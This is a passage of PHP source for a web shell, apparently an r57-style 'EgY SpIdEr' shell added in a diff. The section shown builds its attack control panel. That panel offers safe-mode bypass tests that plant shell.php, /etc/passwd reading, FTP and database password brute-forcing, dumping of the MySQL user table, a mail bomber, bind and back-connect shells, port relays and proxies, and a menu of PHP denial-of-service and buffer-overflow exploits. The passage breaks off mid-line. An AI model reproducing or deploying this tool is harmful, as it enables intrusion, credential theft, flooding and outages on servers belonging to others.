value=3 selected>[ 3 ] (<1 sec (default))</option>". +"<option value=4>[ 4 ] (<10 sec)</option><option value=5>[ 5 ] (>100 sec (danger))</option><option value=6>[ 6 ] (>>100 sec (danger))</option></select>"; +echo $fs.$table_up1.div_title($lang[$language.'_text145'],'id41').$table_up2.div('id41').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',30,(!empty($_POST['dir_rlph'])?($_POST['dir_rlph']):($dir))).ws(2).'<b>'.$lang[$language.'_text55'].'</b>'.ws(2).in('text','end_rlph',6,(!empty($_POST['end_rlph'])?($_POST['end_rlph']):('.php'))).ws(2).in('hidden','cmd',0,'safe_dir').ws(2).'<b>'.$lang[$language.'_text146'].'</b>'.ws(2).$select_n_rlph.ws(2).in('hidden','realpath',0,'realpath').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts; +echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):($tempdir.'test.zip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts; +echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):($tempdir.'test.bzip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up3.div('id27').$ts; +echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13')); +echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14')); +echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text133'],'id39').$table_up2.div('id39').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test18_file2',96,(!empty($_POST['test18_file2'])?($_POST['test18_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test18')); +echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test18_file1',96,(!empty($_POST['test18_file1'])?($_POST['test18_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts; +echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15')); +echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts; +echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts; +echo "<tr><td valign=top width=70%>".$ts; +echo sr(20,"<b>".$lang[$language.'_text30'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe); +echo $te."</td><td valign=top width=30%>".$ts; +echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe); +echo $te."</td></tr>"; +echo $te.'</div>'.$table_end1; +} + + +{ +echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts; +echo "<tr><td valign=top width=70%>".$ts; +echo sr(20,"<b>".$lang[$language.'_text4'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe); +echo $te."</td><td valign=top width=30%>".$ts; +echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe); +echo $te."</td></tr>"; +echo $te.'</div>'.$table_end1; +} + + +echo $fs.$table_up1.div_title($lang[$language.'_text171'],'id98200').$table_up2.div('id98200').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'egy_5_2_3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + + + +{ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} + + + + +{ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts; +echo "<tr><td valign=top width=50%>".$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile5',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile6',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile7',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile8',35,'')); +echo $te."</td><td valign=top width=50%>".$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile9',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile10',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile11',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile12',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile13',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile14',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile15',35,'')); +echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te."</td></tr>"; +echo $te.'</div>'.$table_end1.$fe; +} + + + + +{ + echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts; + echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>",$select_downloaders.in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); + echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir.'/download.file').ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); + echo $te.'</div>'.$table_end1.$fe; +} + + +echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts; +echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh); +echo $te.'</div>'.$table_end1.$fe; + + +{ +echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."<tr>".$fs."<td valign=top width=33%>".$ts; + + +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text94']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir)); +echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>"); +echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']); +echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root")))); +echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic')))); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1'])); + + +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("egy_spider@hotmail.com")))); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir)); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); + + +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("egy_spider@hotmail.com")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir)); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); + + +echo $te."</td>".$fe."</tr></div></table>"; +} + + + + +{ +echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."<tr>".$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("egy_spider@hotmail.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello EgY SpIdEr")))); +echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>'); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); + + +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("egy_spider@hotmail.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("file from egy spider shell")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',30,$dir)); +echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); + + +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text139']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("egy_spider@hotmail.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello EgY SpIdEr")))); +echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=1>'.(!empty($_POST['text'])?($_POST['text']):("flood text here")).'</textarea>'); +echo sr(25,"<b>Flood".$arrow."</b>",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."<b>Size(kb)".$arrow."</b>".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10))); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); + + +echo $te."</td>".$fe."</tr></div></table>"; +} + + + + +{ +$select = '<select name=db>'; +if($mysql_on) $select .= '<option value=MySQL>MySQL</option>'; +if($mssql_on) $select .= '<option value=MSSQL>MSSQL</option>'; +if($pg_on) $select .= '<option value=PostgreSQL>PostgreSQL</option>'; +if($ora_on) $select .= '<option value=Oracle>Oracle</option>'; +if($mysqli_on) $select .= '<option value=MySQLi>MySQLi</option>'; +if($msql_on) $select .= '<option value=mSQL>mSQL</option>'; +if($sqlite_on) $select .= '<option value=SQLite>SQLite</option>'; +$select .= '</select>'; + + +echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up3.div('id36').$ts."<tr>".$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text134']."</div></b></font>"; + + +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute')); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("")))); +echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>"); +echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']); +echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']); +echo sr(35,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic')))); +echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1'])); + + +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>"; + + +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9'])); + + +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>"; + + +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center id='n'><textarea cols=30 rows=4 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSHOW TABLES;\nSELECT * FROM user;\nSELECT version();\nSELECT user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div>"; + + +echo "</td>".$fe."</tr></div></table>"; +} + + + + +{ +echo $table_up1.div_title($lang[$language.'_text81'],'id555555').$table_up2.div('id555555').$ts."<tr>".$fs."<td valign=top width=25%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',10,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',10,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',10,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',10,'irc.dalnet.ru')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',10,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','proxy_port',10,'31337')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +echo $table_up1.div_title($lang[$language.'_text81'],'id5525555').$table_up2.div('id5525555').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port1',35,'9999').ws(4).in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe."</tr></div></table>"; + + +echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."<tr><td valign=top width=25%>".$ts; +echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>"; +echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit [pack()]').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF [unserialize()]').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'BoF ZendEngine').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [dl()] vuln').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [preg_match()](PHP<5.2.1)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Mem_limit [str_repeat()](PHP<5.2.1)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload [tempnam()](PHP<5.1.2)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF [wordwrap()](PHP<5.1.2)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF [array_fill()](PHP<5.1.2)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF [substr_compare()](PHP<5.1.2)').$fe); +echo $te."</td><td valign=top width=25%>".$ts; +echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>"; +echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Arr. Cr. 64b[unserialize()](PHP<5.2.1)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF [str_ireplace()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF [htmlentities()](PHP<5.1.6,4.4.4)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'BoF [zip_entry_read()](PHP<4.4.5)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF [sqlite_udf_decode_binary()](PHP<5.2.1)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'BoF [msg_receive()](PHP<5.2.1)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'BoF [php_stream_filter_create()](PHP5<5.2.1)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'BoF [unserialize()](PHP<4.4.4)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos21').in('submit','submit',0,'BoF [gdImageCreateTrueColor()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos22').in('submit','submit',0,'BoF [gdImageCopyResized()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos23').in('submit','submit',0,'DoS [iconv_substr()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos24').in('submit','submit',0,'DoS [setlocale()](PHP<5.2.x)').$fe); +echo $te."</td><td valign=top width=25%>".$ts; +echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>"; +echo sr(10,"",$fs.in('hidden','cmd',0,'dos25').in('submit','submit',0,'DoS [glob()] 1 (PHP<5.2.x)').$fe); +echo 